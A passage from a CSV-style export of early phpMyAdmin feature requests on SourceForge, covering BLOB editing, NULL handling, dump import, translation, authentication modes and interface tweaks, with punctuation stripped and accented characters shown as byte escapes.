Original URL https sourceforge.net p phpmyadmin feature requests 14 https sourceforge.net p phpmyadmin feature requests 14 Original author korakot","enhancement"
"24444","4727","Add ability to move rename) across db s. Similar to the way tables can be copied across databases, I find the ability I am sure it used to exist) of moving a table to another database very useful.
If someone could update the rename code to act like the copy code, then I am sure that would do the trick.
Thanks Vipersoft Original URL https sourceforge.net p phpmyadmin feature requests 76 https sourceforge.net p phpmyadmin feature requests 76 Original author vipersoft","enhancement"
"24444","4728","Insert clone data).
In tbl change, add some radio buttons to specify what to do after the saving of the current record O go back to browse X insert new data) O insert clone last data) Original URL https sourceforge.net p phpmyadmin feature requests 15 https sourceforge.net p phpmyadmin feature requests 15 Original author lem9","enhancement"
"24444","4729","db transfer from server1 to server2.
A user in the forum asks for a way to transfert a db to another server, without dumping reloading.
Original URL https sourceforge.net p phpmyadmin feature requests 78 https sourceforge.net p phpmyadmin feature requests 78 Original author lem9","enhancement"
"24444","4730","Re Bookmarks.
Hi I have just setup the lastest CVS files and tested out the new bookmark feature cool), I just have one suggestion When you select the bookmark can the bookmarked sql string automatically appear in the amp;quot;Run Sql Query amp;quot; text box.
I run many queries that are identical apart from one parameter.
It would be nice if the bookmarked query would appear and then I could just edit it a little each time I wanted to run it.
eg...
If I bookmarked a query such as select from users where user = pete Then next time I wanted to bring up a users information I could just change pete to another name etc... Have fun Pete Kelly Original URL https sourceforge.net p phpmyadmin feature requests 16 https sourceforge.net p phpmyadmin feature requests 16 Original author trafficg","enhancement"
"24444","4731","get table def support FULLTEXT.
Hi, in lib.inc.php3, get table def should support FULLTEXT indexes.
Some of the problems if we don t support it we can t copy a table containing a FULLTEXT index if we try to dump the structure, the result is not valid Original URL https sourceforge.net p phpmyadmin feature requests 17 https sourceforge.net p phpmyadmin feature requests 17 Original author lem9","enhancement"
"24444","4732","Bookmarked SQL query appear disappear.
You can see the amp;quot;Bookmarked SQL query amp;quot; combo box under the amp;quot;Run SQL query amp;quot; textarea when you click on a database left frame).
But when you click on a table still left frame) the page showing still has the amp;quot;Run SQL query amp;quot; textarea but not anymore the amp;quot;Bookmarked SQL query amp;quot; combo box ... Should nt it be added ?
Original URL https sourceforge.net p phpmyadmin feature requests 18 https sourceforge.net p phpmyadmin feature requests 18 Original author hal0802","enhancement"
"24444","4733","Dump) read sql dump file uploaded via ftp in 2.3.1).
first of all thanks to you guy for improving this tool so much.
here is the xc2xb4problemxc2xb4 i guess that there are many people like me testing their db on a local host and then have to transfer the data to their public webspace.
though most providers have restricted the fileupload to 2MB php standard value) the html upload is not possible.
even smaller files amp;gt; 1MB) produced i my case) time out server errors.
it would be great if you could implement the possibility to read the sql dump from a file stored on the server, so this file could be uploaded with ftp.
sorry asking for new features instead of sending code but if some of our projects will be finished there hopefully will be more time to spend with open source coding.
thanks marcus Original URL https sourceforge.net p phpmyadmin feature requests 81 https sourceforge.net p phpmyadmin feature requests 81 Original author anonymous","enhancement"
"24444","4734","config options, safe mode.
When running apache php under safe mode, the set time limit ) calls don t work; ie php error msgs like amp;quot;Warning Cannot set time limit in safe mode amp;quot; during SQL data dumps.
I d like to see a safe mode unfriendly calls wrapped in a conditional, the conditional based on whether safe mode is on off.
In other words, a config option to make phpMyAdmin safe mode friendly.
Original URL https sourceforge.net p phpmyadmin feature requests 19 https sourceforge.net p phpmyadmin feature requests 19 Original author anonymous","enhancement"
"24444","4735","get table def support key length.
In lib.inc.php3, get table def should support key length.
In the present version we lose the information about key lengths on table copy or table dump.
Original URL https sourceforge.net p phpmyadmin feature requests 20 https sourceforge.net p phpmyadmin feature requests 20 Original author lem9","enhancement"
"24444","4736","Advanced Search.
One big feature that is missing in phpmyadmin is a whole range of search options.
The search on the main.php page would search all fields in all databases.
The search on the db details page would search all fields of all the tables in the current DB.
The search on the table properties page would search all fields in the current table.
The output would create one or more html tables, each table would be for a different database table, the tables would also contain an edit button link.
Pete Original URL https sourceforge.net p phpmyadmin feature requests 22 https sourceforge.net p phpmyadmin feature requests 22 Original author trafficg","enhancement"
"24444","4737","?)
Edit Form Generator.
une extention xc5x95 phpMyAdmin pour gxc3xa9nerer un code php de base xc5x95 partir des tables pour faire des formulaires d xc3xa9dition amp;quot;affinxc3xa9s amp;quot;.
Les formulaires de phpMyAdmin 1xc2xb0 donnent accxc4x8ds a tous les champs.
2xc2xb0 sont dynamiquement recrxc3xa9xc3xa9 xc5x95 chaque affichage.
3xc2xb0 affichent des informations sur le type de chaque champs 4xc2xb0 ne vxc3xa9rifient pas l intxc3xa9gritxc3xa9 d un contenu de champs lorsqu il reprend un id venant d une autre table de la base.
Je voudrais faire un gxc3xa9nxc3xa9rateur paliant c est 4 points.
Le but est de gxc3xa9nxc3xa9rer des formulaires amp;quot;prxc4x99t amp;quot; xc5x95 l emploi.
pour faire une page d admin orientxc3xa9 vers la structure de l information et pas orientxc3xa9 vers la structure de la base.
ainsi que le code gxc3xa9nxc3xa9rique traitant la soumission du formulaire.
An extention to the project to generate a generic code form a database to a HTML form.
Actual Form of PHPMyAdmin 1xc2xb0 give an acces edit to all fields 2xc2xb0 are dynamic rebuilt on every request 3xc2xb0 show all information about records 4xc2xb0 don t check relation between table.
The extention should prupose an Form generator readty to use on a website.
Two Use Admin page with control of relation between table.
User page on Insert Edit records with control of content.
Original URL https sourceforge.net p phpmyadmin feature requests 23 https sourceforge.net p phpmyadmin feature requests 23 Original author moosh fr","enhancement"
"24444","4738","Ability to upload binary files to BLOBs.
Heya!
Wouldn t it be great if one is able to manage BLOB fields with phpMyAdmin by being able to upload binary files images for example) from the local computer into the database and have them if correct content type defined for example) displayed in phpMyAdmin?
I don t know how much work that could be, but since i m trying long time to find something to get pictures in mysql for an addressbook with little photos) i would greatly appreciate that...
Original URL https sourceforge.net p phpmyadmin feature requests 85 https sourceforge.net p phpmyadmin feature requests 85 Original author altpeter","enhancement"
"24444","4739","DB amp; Table Size.
It would be useful if we can display the size of the Databases amp;amp; Tables or even a summary page with the size breakdown.
Something like what du ach produces.
Original URL https sourceforge.net p phpmyadmin feature requests 24 https sourceforge.net p phpmyadmin feature requests 24 Original author valcrow","enhancement"
"24444","4740","bookmarktable in doc.
It s very very minor remarks.
In doc for configuration about cfgServer[n][ bookmarktable ] there is not clear write that we must write the name of the table.
That s can seem logic but...
Original URL https sourceforge.net p phpmyadmin feature requests 87 https sourceforge.net p phpmyadmin feature requests 87 Original author moosh fr","enhancement"
"24444","4741","3 check boxes for indexes.
try to translate in english below.
Pour la crxc3xa9ation d une table ou l ajout d un champs.
on a 3 check box.
PRIMARY UNIQUE et INDEX.
Mais sauf si je me trompe.
UNIQUE amp;gt; toujours un index et PRIMARY amp;gt; Toujours un INDEX UNIQUE alors pour koi un check box et pas radio ?
When adding a fields we have 3 check box for PRIMARY UNIQUE et INDEX.
but if I n not in wrong UNIQUE is always an index and PRIMARY is always an INDEX UNIQUE so why a check box and not a radio with 4 choice ?
Original URL https sourceforge.net p phpmyadmin feature requests 25 https sourceforge.net p phpmyadmin feature requests 25 Original author moosh fr","enhancement"
"24444","4742","mySQL Space Usage suggestion.
Hi, maybe i have a suggestion for a next phpMyAdmin Version to show in tbl properties.php3 the spaceusage for the current table.
Here is my sample code http www.neptunlabs.de phpMyAdmin tbl properties.new Steve Alberty ps how can i develop on phpmyadmin cvs?
Original URL https sourceforge.net p phpmyadmin feature requests 26 https sourceforge.net p phpmyadmin feature requests 26 Original author anonymous","enhancement"
"24444","4743","ignore empty fields on table create.
when creating a new table table view amp;gt; create table) what about ignoring fields when the field name is empty ?
When creating a table, I and probalby others ) not always know exactley how many fields I need.
What do you think?
Would be more user friendly.
Original URL https sourceforge.net p phpmyadmin feature requests 27 https sourceforge.net p phpmyadmin feature requests 27 Original author swix","enhancement"
"24444","4744","length of textfields and textareas.
what about using bigger input fields and textareas while editing records ?
Dynamicaly if length of field amp;lt; 40, show a field of the right size, otherwise show a field of size 40), or by adding 3 variables to the config file text field length, textarea rows nb, textarea cols nb...) to make it work in both IE and netscape...) Original URL https sourceforge.net p phpmyadmin feature requests 28 https sourceforge.net p phpmyadmin feature requests 28 Original author swix","enhancement"
"24444","4745","tbl properties better links ordering.
[ ] table view tbl properties) move the amp;quot;Table type amp;quot; at the end of the page, as well as the amp;quot;Table comments amp;quot; input field.
But display the comment if any) under the title Database table \n comment) [ ] table view tbl properties) move the amp;quot;Select amp;quot; and amp;quot;Insert amp;quot; links higher before amp;quot;Check table amp;quot;) important functions should be higher on the page than functions used less often.
Original URL https sourceforge.net p phpmyadmin feature requests 29 https sourceforge.net p phpmyadmin feature requests 29 Original author swix","enhancement"
"24444","4746","size field memo..
It s perhaps convival to have in bottom of form to create or alter a table a condensed memo with size in byte for each type of fields.
Original URL https sourceforge.net p phpmyadmin feature requests 91 https sourceforge.net p phpmyadmin feature requests 91 Original author moosh fr","enhancement"
"24444","4747","User should not see all databases names.
Create a new user with no general privileges.
Give him all privileges to some database that does not exist.
Reload MySQL.
Then login with this user and he will see all database names but not the tables).
Original URL https sourceforge.net p phpmyadmin feature requests 32 https sourceforge.net p phpmyadmin feature requests 32 Original author lem9","enhancement"
"24444","4748","adding CSS page break in documentation.h.
like this h2 \{ font family Verdana, Arial, Helvetica, sans serif; font size large; font weight bold; color 000066; page break before right \} Original URL https sourceforge.net p phpmyadmin feature requests 92 https sourceforge.net p phpmyadmin feature requests 92 Original author moosh fr","enhancement"
"24444","4749","Blob No real edit insert possible.
It should be possible to edit or insert in blob fields.
At the moment, you can only edit or insetr like in a textbox, if there are linebreaks, the text will not submitted after the first linebreak return).
When will this come?
Original URL https sourceforge.net p phpmyadmin feature requests 33 https sourceforge.net p phpmyadmin feature requests 33 Original author anonymous","enhancement"
"24444","4750","user details privileges in MySQL speak.
Outsourced strings in the lang directory should not be used on every occasion.
For example, the privilege names amp;quot;Drop, Select... amp;quot; in user details.php3 should stay in English use literals), because 1\.
they are difficult to translate in an intuitive way 2\.
a person who is responsible for user administration must know this MySQL speak ...
Original URL https sourceforge.net p phpmyadmin feature requests 34 https sourceforge.net p phpmyadmin feature requests 34 Original author lem9","enhancement"
"24444","4751","Special char.
in table names user details).
Modify tbl create, tbl properties to support table names like amp;quot;test table amp;quot; for MySQL amp;gt;= 3.23.6 Original URL https sourceforge.net p phpmyadmin feature requests 35 https sourceforge.net p phpmyadmin feature requests 35 Original author anonymous","enhancement"
"24444","4752","Import dbaseIII format files.
It would be nice if phpMyAdmin could import dbaseIII format files.
See http bugs.debian.org cgi bin bugreport.cgi?bug=119762 Original URL https sourceforge.net p phpmyadmin feature requests 95 https sourceforge.net p phpmyadmin feature requests 95 Original author d3xter","enhancement"
"24444","4753","BROWSE link at top of table structure.
Very simple fix Please put a BROWSE link at the TOP of the table structure display.
Currently there is a link at the bottom, but this is a pain because in order to use it, you have to scroll down to the bottom of the table structure.
If your table has many fields, then you have to scroll down far everytime you want to switch from viewing the table structure to browsing the content.
If you use PhpMyAdin hundreds of times a day, like I do, life would be much, much easier if you d put a link at the top!
Original URL https sourceforge.net p phpmyadmin feature requests 36 https sourceforge.net p phpmyadmin feature requests 36 Original author anonymous","enhancement"
"24444","4754","check box beside each table.... add a check box beside each table...
If I wanna, for example, drop 15 tables, I just mark the check boxes and click a drop button.
It s really boring click drop, yes, drop, yes, drop.....
Original URL https sourceforge.net p phpmyadmin feature requests 37 https sourceforge.net p phpmyadmin feature requests 37 Original author anonymous","enhancement"
"24444","4755","Graphical navigation bar.
Create some icons for important functions, to see if a graphical navbar would be interesting.
Original URL https sourceforge.net p phpmyadmin feature requests 38 https sourceforge.net p phpmyadmin feature requests 38 Original author lem9","enhancement"
"24444","4756","Configuration files via the web.
Would it be possible to do all of the configuration via web?
Basically, just have the user drop the program into the directory, chmod a couple files, and point their browser.
Some ideas on this tangent Actual configuration data is in a primary database, a config file gets rebuilt everytime a user adds deletes a server.
upgrading and configuration can be done amp;quot;on the fly amp;quot; easier to enforce security?
by continuing to have a config file, entire app is not at the whim of a single database.
Any ideas are welcome, if you would like to see how some people have implemented something similar, check out the installation process of Phorum 3.3.x phorum.org) Original URL https sourceforge.net p phpmyadmin feature requests 97 https sourceforge.net p phpmyadmin feature requests 97 Original author anonymous","enhancement"
"24444","4757","Multi Delete Records Checkbox.
When Browsing table s data, they can delete one by one record, it s better than if have new interface with multi delete checkbox.
Original URL https sourceforge.net p phpmyadmin feature requests 98 https sourceforge.net p phpmyadmin feature requests 98 Original author anonymous","enhancement"
"24444","4758","no dhtml for only db.
when only db is set in the config for a database, dhtml shouldn t be used, makes no sense, since there is only one database to operate on.
all tables should be displayed, the tree display could be abandonded.
Original URL https sourceforge.net p phpmyadmin feature requests 39 https sourceforge.net p phpmyadmin feature requests 39 Original author anonymous","enhancement"
"24444","4759","NULL field values.
phpMyAdmin needs the ability to set a field to NULL.
As it stands now, I end up corrupting rows when I try to edit stuff.
Starting to be a real pain.
Original URL https sourceforge.net p phpmyadmin feature requests 41 https sourceforge.net p phpmyadmin feature requests 41 Original author anonymous","enhancement"
"24444","4760","Ability to tweak MyISAM better.
eg.
instead of sending this to the server CREATE TABLE sessions sesskey varchar 32) NOT NULL default , expiry int 10) unsigned NOT NULL default 0 , data text NOT NULL, PRIMARY KEY sesskey) ) TYPE=MyISAM; have optional tickbox s for CREATE TABLE sessions sesskey varchar 32) NOT NULL default , expiry int 10) unsigned NOT NULL default 0 , data text NOT NULL, PRIMARY KEY sesskey) ) TYPE=MyISAM PACK KEYS=1 CHECKSUM=1 DELAY KEY WRITE=1; packkey s helps with searching thru index s, checksum makes finding bad records in a data file easier and delaykeywrite gives the server a bit of a break when its super hammered webmaster outworld.cx Original URL https sourceforge.net p phpmyadmin feature requests 42 https sourceforge.net p phpmyadmin feature requests 42 Original author anonymous","enhancement"
"24444","4761","?)
Customizable Links in Left Frame Home.
Hi everybody!
It would be great if I could include a customizable link in the left frame above the Home link) and or on the home page Maybe in a new category Links below the category MySQL ).
We would need to have e.g.)
two fields in the config.inc.php file cfgCustomLinkName = Back to ISP Homepage ; cfgCustomLinkURL = .. ; That would help people going back from PMA to the ISP Homepage.
What do you think?
Chris.
Original URL https sourceforge.net p phpmyadmin feature requests 100 https sourceforge.net p phpmyadmin feature requests 100 Original author chris01","enhancement"
"24444","4762","SQL File .zip .tar.gz.
If i would the .sql in gzipped than i download a sql and not a .zip Please change by gzipped the name to .zip and normal to .sql?
Original URL https sourceforge.net p phpmyadmin feature requests 43 https sourceforge.net p phpmyadmin feature requests 43 Original author obelixpower","enhancement"
"24444","4763","PHP4 HTTP compression.
Modern browsers support compression of contents.
See the forum thread for additional details and possibilities.
Original URL https sourceforge.net p phpmyadmin feature requests 44 https sourceforge.net p phpmyadmin feature requests 44 Original author lem9","enhancement"
"24444","4764","Config option for the frameborder.
I don t understand why there is this frameborder, since it wasn t there in earlier versions.
I think there should be an option, something like cfgFrameBorder = FALSE and in index.php frameborder= amp;quot; amp;lt;?
echo cfgFrameBorder) ?
1 0 ?
amp;gt; amp;quot; ) Original URL https sourceforge.net p phpmyadmin feature requests 102 https sourceforge.net p phpmyadmin feature requests 102 Original author anonymous","enhancement"
"24444","4765","automatic NOW ) on first timestamp field.
tbl change.php should set the function to amp;quot;NOW ) amp;quot; if the field type is amp;quot;timestamp amp;quot;, and only if it is the first timestamp field in the table.
This way it would work like on the command line tool the timestamp is updated automatically.
Comments ?
I could try to implement it, if nobody is against this idea...
Original URL https sourceforge.net p phpmyadmin feature requests 45 https sourceforge.net p phpmyadmin feature requests 45 Original author swix","enhancement"
"24444","4766","null field values checkbox.
After reading the documentation, and finding out that setting a field to null actually sets it to null, I m curious as to why that s not the default value for a field during an edit when the value is null.
As it stands now, you have to know which fields were set to NULL, and remember to type null into those fields, or else they become blank.
Even worse are integer and datetime fields, which take on a numeric value, and the current date, respectively.
In my bug tracking database, I ve accidentally amp;quot;closed amp;quot; numerous bugs by accidentally setting the resolved date field to something other than null without intending to do so.
Am I the only one that has trouble with this?
Original URL https sourceforge.net p phpmyadmin feature requests 46 https sourceforge.net p phpmyadmin feature requests 46 Original author anonymous","enhancement"
"24444","4767","Server Name.
I think it would be cool if you could also put a name in the config.inc.php file for each one of the servers and then also add it to the select menu where you choose the servers from .
I find it confusion with all of the ip address in the listing.
Original URL https sourceforge.net p phpmyadmin feature requests 105 https sourceforge.net p phpmyadmin feature requests 105 Original author sidhighwind","enhancement"
"24444","4768","Add Server Name in Left menu.
I use phpMyAdmin to administer 2 diffrent MySQL servers, both with the same tables, but not master slave config.
It would be nice if instead of amp;quot;Home amp;quot; at the top left it showed the Current Server name as a visual reference.
One you click on a database name there is no way to know 100 which server you are on without deciphering the ?server=x in your head.
Thanks for the great package, P Original URL https sourceforge.net p phpmyadmin feature requests 106 https sourceforge.net p phpmyadmin feature requests 106 Original author anonymous","enhancement"
"24444","4769","unlimited set time limit ).
Ok, maybe I m the only person who needs this, then again maybe not, but on some queries that I run, I need to let MySQL chug away REGEXP, lots of joins, etc).
Is there a way to let me click a checkbox since there may be cases where letting the script chug away would be a bad thing... thus, let the DBA programmer decide if they want to take that risk.
I did look at lib.inc.php, but it seems like the values are hardcoded,a dn the max being 20min.
Thanks Stephen VanDyke stephen opido.com Original URL https sourceforge.net p phpmyadmin feature requests 47 https sourceforge.net p phpmyadmin feature requests 47 Original author anonymous","enhancement"
"24444","4770","New options in table view.
Add a link beside each index, to rebuild it drop and create?)
Original URL https sourceforge.net p phpmyadmin feature requests 48 https sourceforge.net p phpmyadmin feature requests 48 Original author lem9","enhancement"
"24444","4771","Query by example outsource strings.
As noticed by Geert Lund, English strings are still in tbl qbe.php3.
Original URL https sourceforge.net p phpmyadmin feature requests 49 https sourceforge.net p phpmyadmin feature requests 49 Original author lem9","enhancement"
"24444","4772","taking AUTO INCREMENT into account.
problem 1\.
Dump a DB with a AUTO INCREMENT column, where one row has the value of 0 in that column.
2\.
Run the dumped file thru phpMyAdmin 3\.
As it should, the mysql server inserts the rows and the field which originally had a value of 0 with a different value, often causing duplicate rows if it happens to be a primary key column, which it almost always is when dealing with AUTH INCREMENTing indices).
solution 1\.
check for auto increment and value of 0 2\.
add an UPDATE query after inserting all the rows setting that specific row back to 0 to ensure that the DB s are identical.
this is no bug in the MySQL server, but rather a malfunction of your client.
You should take into account the fact that people dump very large DB s such as a forum with 6 7,000 posts) and finding these errors in a 500KB large text file is quite a pain.
Original URL https sourceforge.net p phpmyadmin feature requests 108 https sourceforge.net p phpmyadmin feature requests 108 Original author anonymous","enhancement"
"24444","4773","New link quot;Show PHP information quot;.
On the home page, show this link to all users, and call phpinfo ).
Would be useful to diagnose problems.
Original URL https sourceforge.net p phpmyadmin feature requests 51 https sourceforge.net p phpmyadmin feature requests 51 Original author lem9","enhancement"
"24444","4774","kill base gt; stupid error killer.
Just an idea.
In bottom of db detail is a link to kill the database.
It s perhaps good to have a flag in config to show hide this link.
That s can be automatic with the users acces in mySql for the connected user.
en franxc3xa7ais parce que c ma langue.
En bas de la page db detail il y a un lien pour effacer une base.
Ca pourrait xc4x99tre bien d avoir dans la config un flag qui dit si oui ou non il faut montre ce lien.
Original URL https sourceforge.net p phpmyadmin feature requests 52 https sourceforge.net p phpmyadmin feature requests 52 Original author moosh fr","enhancement"
"24444","4775","?)
plug in facilities.
Ask previous announcedf I work on a add on for phpMyAdmin.
It s to big to be directly join to phpMyAdmin Project.
So on every new version I need to modify some file of phpMyAdmin.
It s perhaps the same for other plug in coder.
It s perhaps cool to add in conf.inc.php a system to plug in.
I thing that s enough to can add a link in .php file to the plugin script.
phpMyAdmin plugin pluginName ... in config.inc.php an array fix wich file of plugin amp;quot;include amp;quot; in bottom of wich file of phpMyAdmin like plug[ amp;quot;pluginName amp;quot;][plug] = amp;quot;index.php amp;quot;; plug[ amp;quot;pluginName amp;quot;][to] = amp;quot;db detail amp;quot;; Original URL https sourceforge.net p phpmyadmin feature requests 53 https sourceforge.net p phpmyadmin feature requests 53 Original author moosh fr","enhancement"
"24444","4776","Authentication always prompt, no stduser.
I would like to request a third authentication method for phpMyAdmin, sort of a mix between Basic and Advanced modes.
This new method would prompt the user for a username password like Advanced mode) but otherwise behave exactly as Basic mode.
In other words, it would just try to connect as though it got the username password from config.inc.php.
It would not need a stduser account like Advanced mode does.
The benefits This allows users who do not have the privs to create a stduser account for Advanced mode to still have some of the advantages of Advanced mode no need to enter username password in config.inc.php multiple people can use the product This also provides better security when connecting to multiple servers.
For instance, I currently have the need to connect to one server via Advanced mode and another via Basic because I don t have perms to create the stduser on the second database).
With the current setup it is not safe to do that because Advanced mode does not work with an .htaccess file, and that means the Basic database is not protected in any way i.e.
anyone who knows the correct URL can administer the Basic database without being authenticated) Original URL https sourceforge.net p phpmyadmin feature requests 54 https sourceforge.net p phpmyadmin feature requests 54 Original author ljm","enhancement"
"24444","4777","Grant revoke to add edit users.
Presently phpMyAdmin always uses a manual insert into the mysql tables to add users.
I think that if the version of MySQL is high enough, we should rather use the proper GRANT REVOKE commands, to avoid having to reload the server.
Original URL https sourceforge.net p phpmyadmin feature requests 112 https sourceforge.net p phpmyadmin feature requests 112 Original author robbat2","enhancement"
"24444","4778","Editable blobs.
I would need to edit and insert into blobs.
Why is this not supported?
I have included it myself, here is my version tbl change php) OLD VERSION We don t want binary data to be destroyed if strstr row table def[ amp;quot;Type amp;quot;], amp;quot;blob amp;quot;) || strstr row table def[ amp;quot;Type amp;quot;], amp;quot;binary amp;quot;)) amp;amp; amp;amp; !empty data)) \{ echo amp;quot; amp;lt;td amp;gt; strBinary amp;lt; td amp;gt; amp;quot;; \} else \{ echo amp;quot; amp;lt;td amp;gt; amp;lt;select name=\ amp;quot;funcs[ field] \ amp;quot; amp;gt; amp;lt;option amp;gt;\n amp;quot;; MY VERSION We don t want binary data destroyed elseif strstr row table def[ amp;quot;Type amp;quot;], amp;quot;blob amp;quot;)) \{ echo amp;quot; amp;lt;td amp;gt; amp;lt;textarea rows=4 cols=40 wrap=physical name=fields[ field] style=\ amp;quot;width cfgMaxInputsize;\ amp;quot; maxlength= len amp;gt; special chars amp;lt; textarea amp;gt; amp;lt; td amp;gt; amp;quot;; \} else \{ fieldsize= len amp;gt;40?
40 len); echo amp;quot; amp;lt;td amp;gt; amp;lt;input type=text name=fields[ field] value=\ amp;quot; amp;quot;.
special chars.
amp;quot;\ amp;quot; maxlength=\ amp;quot; len\ amp;quot; size=\ amp;quot; fieldsize\ amp;quot; amp;gt; amp;lt; td amp;gt; amp;quot;; \} echo amp;quot; amp;lt; tr amp;gt;\n amp;quot;; Original URL https sourceforge.net p phpmyadmin feature requests 55 https sourceforge.net p phpmyadmin feature requests 55 Original author daemon72","enhancement"
"24444","4779","more than one change in one action.
in tbl properties.php write modify in top of amp;lt;TABLE amp;gt; and below replace link on amp;quot;tbl alter.php amp;quot; with a check box and place a button in bottom of amp;lt;Table amp;gt; perhaps same for index and Unique and radiobox for primary.
Original URL https sourceforge.net p phpmyadmin feature requests 56 https sourceforge.net p phpmyadmin feature requests 56 Original author moosh fr","enhancement"
"24444","4780","Preserve sort order after editing.
In table browseing mode, clicking on a column sorts the table by that column.
If you then edit a record and save changes, the sort order is gone.
Why can t the sort order be preserved?
Original URL https sourceforge.net p phpmyadmin feature requests 60 https sourceforge.net p phpmyadmin feature requests 60 Original author anonymous","enhancement"
"24444","4781","delete all tables.
Is there a way to include a button or something that will delete all the tables in a database and let you start fresh?
Original URL https sourceforge.net p phpmyadmin feature requests 61 https sourceforge.net p phpmyadmin feature requests 61 Original author spinfusion","enhancement"
"24444","4782","Browser dependant sizing.
The size of the text fields should vary depending on the browser, as some of the older browsers have the fields a LOT bigger than they are on the new fields.
fonts are also an issue, depending on the browser, there is a variance in the size still.
see the article on PHPBuilder about browser dependant CSS as a possible solution.
Original URL https sourceforge.net p phpmyadmin feature requests 62 https sourceforge.net p phpmyadmin feature requests 62 Original author robbat2","enhancement"
"24444","4783","Editable Blobs.
Yes, now I can edit blobs, but when I make a new entry or edit a empty blob the blob still is shown as normal textfield.
Which makes it necessary to first insert something in the blob, save the record, open it again and then edit it.
Please make the blob fully editable at first input too!
Jo ; amp;gt; Original URL https sourceforge.net p phpmyadmin feature requests 63 https sourceforge.net p phpmyadmin feature requests 63 Original author daemon72","enhancement"
"24444","4784","New dump schema option.
In your options for amp;quot;View dump schema) of database amp;quot; could you provide an output version in php code.
I do not have telnet access to run the .sql version so I d like to just upload a php file and run it from the browser.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 64 https sourceforge.net p phpmyadmin feature requests 64 Original author anonymous","enhancement"
"24444","4785","When MySQL is stopped.
Right, but normally you can post a message in program, not nice to give an amp;gt; error.
amp;gt; For some users seems to be a bug.
amp;gt; amp;gt; amp;gt; phpMyAdmin can t connect because the server is stopped, right?
amp;gt; amp;gt; amp;gt; amp;gt; Marc amp;gt; amp;gt; amp;gt; amp;gt; Valics Lehel a xc3xa9crit amp;gt; amp;gt; amp;gt; amp;gt; amp;gt; amp;gt; I stopped mysql and I refressed the PHPMyAdmin page amp;gt; amp;gt; amp;gt; amp;gt; amp;gt; amp;gt; Warning MySQL Connection Failed Can t connect to MySQL server on amp;gt; amp;gt; amp;gt; 193.226.140.246 111) in home macasa phpMyAdmin lib.inc.php on line amp;gt; 264 amp;gt; amp;gt; amp;gt; Error Original URL https sourceforge.net p phpmyadmin feature requests 66 https sourceforge.net p phpmyadmin feature requests 66 Original author lvalics","enhancement"
"24444","4786","InnoDB support.
Add InnoDB support and foreign key support with InnoDB with the newer versions of mySQL Max).
Original URL https sourceforge.net p phpmyadmin feature requests 119 https sourceforge.net p phpmyadmin feature requests 119 Original author anonymous","enhancement"
"24444","4787","Relation) Referential Integrity for MyISAM.
Since MYSQL does not have referential integrity, I often write sql statements that check if all records correspond with another record in another table and report and non matches......
Original URL https sourceforge.net p phpmyadmin feature requests 69 https sourceforge.net p phpmyadmin feature requests 69 Original author skyman","enhancement"
"24444","4788","images format http burnallgifs.org .
This not is realy a bug but I think that the correct image format for a free software project is a patent free one.
The PNG format have almost all the feartures of the gif format plus a better alpha chanel and is patent free.
Saludos Edu.
Original URL https sourceforge.net p phpmyadmin feature requests 70 https sourceforge.net p phpmyadmin feature requests 70 Original author ladron","enhancement"
"24444","4789","Display large number of fields.
We can limit the number of lines displayed, but could we limit and navigate thru) the number of fields?
When a table is too large, it is difficult to display the goal is to print it.
Original URL https sourceforge.net p phpmyadmin feature requests 71 https sourceforge.net p phpmyadmin feature requests 71 Original author lem9","enhancement"
"24444","4790","Parameters in strings.
I m currently translating phpMyAdmin into Finnish.
However, as the word order in a sentence in Finnish is not always the same as in English, it makes it difficult to correctly translate strings that have been separated into multiple variables in language file.
For example, in tbl properties.php we have amp;lt;?php echo strFields .
.
strEscapedBy; ?
amp;gt;.
Using English language file this becomes amp;quot;Fields escaped by amp;quot;.
Because of amp;quot;limitations amp;quot; of the Finnish language, I can t translate this as it is.
Instead, I m using the phrase amp;quot;Use escape character amp;quot; for strEscapedBy.
In Finnish it is rendered something like amp;quot;Fields Use escape character amp;quot;.
There are also some other examples, although not as severe.
Some strings expect that a dynamic value such as database name) follows the string.
However, it would be more proper in Finnish to use that dynamic value in the middle of the sentence.
To give you an example, something similar could be amp;quot;User JohnDoe has a new password amp;quot; instead of amp;quot;New password assigned for user JohnDoe amp;quot;.
Some strings use s to include dynamic value in the middle of the string.
This should be done in every string.
Original URL https sourceforge.net p phpmyadmin feature requests 73 https sourceforge.net p phpmyadmin feature requests 73 Original author anonymous","enhancement"
"24444","4791","index on BLOBs and multiple indexes.
Hello, I do use indexes on variable length columns TEXT) but phpMyAdmin doesnt support this unfortunately.. i have to copy the query and alter it manually adding index length) after i get an error.
Another thing I don t like When i create a table I often want indexes on different columns, but phpMyAdmin combines them into one index even if I want to have different indexes.
Again I have to copy the query, delete the table and create it manually again with the right settings.
Original URL https sourceforge.net p phpmyadmin feature requests 74 https sourceforge.net p phpmyadmin feature requests 74 Original author brunohaller","enhancement"
"24444","4792","lupport for larger input files.
actually the amp;quot;upload textfile into database amp;quot; refuses to insert more than 16384 lines at once.
Could this value be increased ?
Also, there s no error message when the file is larger, it just reloads the page and nothing else happens.
Original URL https sourceforge.net p phpmyadmin feature requests 75 https sourceforge.net p phpmyadmin feature requests 75 Original author fireball","enhancement"
"24444","4793","faster use of keyboard with javascript.
I suppose to make some small improvements in the interface with smal javascript statements 1\.
sql.php if you want to deleate an entry it is better if the submitbutton for yes has the focus, when the page is loaded, so you can just press amp;quot;enter amp;quot;.
give the form a name amp;lt;form action= amp;quot;sql.php amp;quot; name= amp;quot;DoYouReallyWantForm amp;quot; ... then add amp;lt;script language= amp;quot;JavaScript amp;quot; type= amp;quot;text javascript amp;quot; amp;gt; amp;lt;!
document.DoYouReallyWantForm.elements[10].focus ); amp;gt; amp;lt; script amp;gt; 2\.
index.php the frameset should have a resizeable boarder amp;lt;frameset cols= amp;quot; amp;lt;?php echo cfgLeftWidth; ?
amp;gt;, amp;quot; rows= amp;quot; amp;quot; border= amp;quot;1 amp;quot; frameborder= amp;quot;1 amp;quot; amp;gt; 3\.
all input fields where it makes sense shoudld have onfocus= amp;quot;this.select ) amp;quot; 4\.
try to put more information on one page, with a. a smaller font for the table name on top b. less padding in the tables c. the amp;lt;body marginheight= amp;quot;1 amp;quot; topmargin= amp;quot;1 amp;quot; leftmargin= amp;quot;3 amp;quot; marginwidth= amp;quot;3 amp;quot; ... d. put the ok button on the right of the sql textarea 5\.
put the SQL query textarea on top of the indexes, couse you need it more often 6\.
put amp;quot;Browse Select Insert Empty amp;quot; on top of page Original URL https sourceforge.net p phpmyadmin feature requests 77 https sourceforge.net p phpmyadmin feature requests 77 Original author rubo77","enhancement"
"24444","4794","Inter server operability..
I run 2 servers on phpMyAdmin.
